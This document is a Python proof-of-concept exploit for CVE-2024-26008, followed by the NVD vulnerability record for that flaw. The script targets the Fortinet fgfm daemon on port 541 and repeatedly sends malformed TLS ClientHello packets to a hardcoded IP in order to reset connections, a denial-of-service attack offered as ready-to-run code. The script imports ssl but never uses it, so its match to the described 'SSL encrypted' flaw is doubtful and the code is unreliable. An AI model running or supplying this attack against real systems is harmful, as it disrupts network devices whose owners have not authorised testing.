CVE-2024-26008

# CVE-2024-26008 PoC - Fortinet fgfm daemon DoS via crafted SSL TCP requests # This PoC demonstrates the vulnerability by repeatedly sending malformed # SSL/TLS encrypted TCP packets to the fgfm daemon port to trigger connection resets. import socket import ssl import struct import time TARGET_HOST = "192.168.1.1" # Target Fortinet device IP TARGET_PORT = 541 # Default fgfm daemon port NUM_REQUESTS = 100 # Number of malicious requests to send DELAY = 0.1 # Delay between requests (seconds) def craft_malformed_ssl_packet(): """ Craft a malformed SSL/TLS ClientHello-like packet to trigger the exception handling flaw in the fgfm daemon. """ # TLS record header: ContentType(1) + Version(2) + Length(2) # ContentType 0x16 = Handshake, Version 0x0301 = TLS 1.0 content_type = b'\x16' tls_version = b'\x03\x01' # Malformed handshake payload with corrupted length field # HandshakeType 0x01 = ClientHello handshake_type = b'\x01' # Intentionally corrupted length to trigger exception handling bug malformed_length = b'\xff\xff' # Random garbage data to fill the payload payload = b'\x00' * 32 handshake = handshake_type + malformed_length + payload length = struct.pack('>H', len(handshake)) return content_type + tls_version + length + handshake def exploit(): """ Main exploit function: sends crafted SSL packets to repeatedly reset the fgfm connection, causing denial of service. """ print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}") print(f"[*] Sending {NUM_REQUESTS} crafted SSL requests...") for i in range(NUM_REQUESTS): try: # Create raw TCP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((TARGET_HOST, TARGET_PORT)) # Send malformed SSL/TLS packet packet = craft_malformed_ssl_packet() sock.send(packet) # Attempt to receive response (will likely fail due to reset) try: response = sock.recv(1024) print(f"[+] Request {i+1}: Response received ({len(response)} bytes)") except socket.timeout: print(f"[+] Request {i+1}: Connection timed out (possible reset)") except ConnectionResetError: print(f"[+] Request {i+1}: Connection reset by target!") sock.close() except Exception as e: print(f"[-] Request {i+1}: Error - {e}") time.sleep(DELAY) print(f"[*] Attack completed. {NUM_REQUESTS} requests sent.") print("[*] The fgfm connection should have been repeatedly reset.") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2024-26008", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:34.783", "lastModified": "2025-10-15T17:39:47.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper check or handling of exceptional conditions vulnerability [CWE-703] in FortiOS version 7.4.0 through 7.4.3 and before 7.2.7, FortiProxy version 7.4.0 through 7.4.3 and before 7.2.9, FortiPAM before 1.2.0 and FortiSwitchManager version 7.2.0 through 7.2.3 and version 7.0.0 through 7.0.3 fgfm daemon may allow an unauthenticated attacker to repeatedly reset the fgfm connection via crafted SSL encrypted TCP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.2.8", "matchCriteriaId": "849D41D5-DBB6-4E77-B1F0-C71016531127"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "1FDDB5F3-D229-4208-9110-8860A03C8B59"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.3.0", "matchCriteriaId": "18427F16-7339-4A9E-9FA4-EC7A2D3EE218"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "7.2.10", "matchCriteriaId": "85405C4E-811B-4773-BD2A-45F709B60A98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.4", "matchCriteriaId": "3F2C29AD-A11F-4A5F-8BB0-8600D5F77E72"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.4", "matchCriteriaId": "7A020C2E-1DDB-4737-92D9-B125FFBE007A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.4", "matchCriteriaId": "EB0D2553-E4E6-454A-80F6-9D014A4710D3"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-041", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}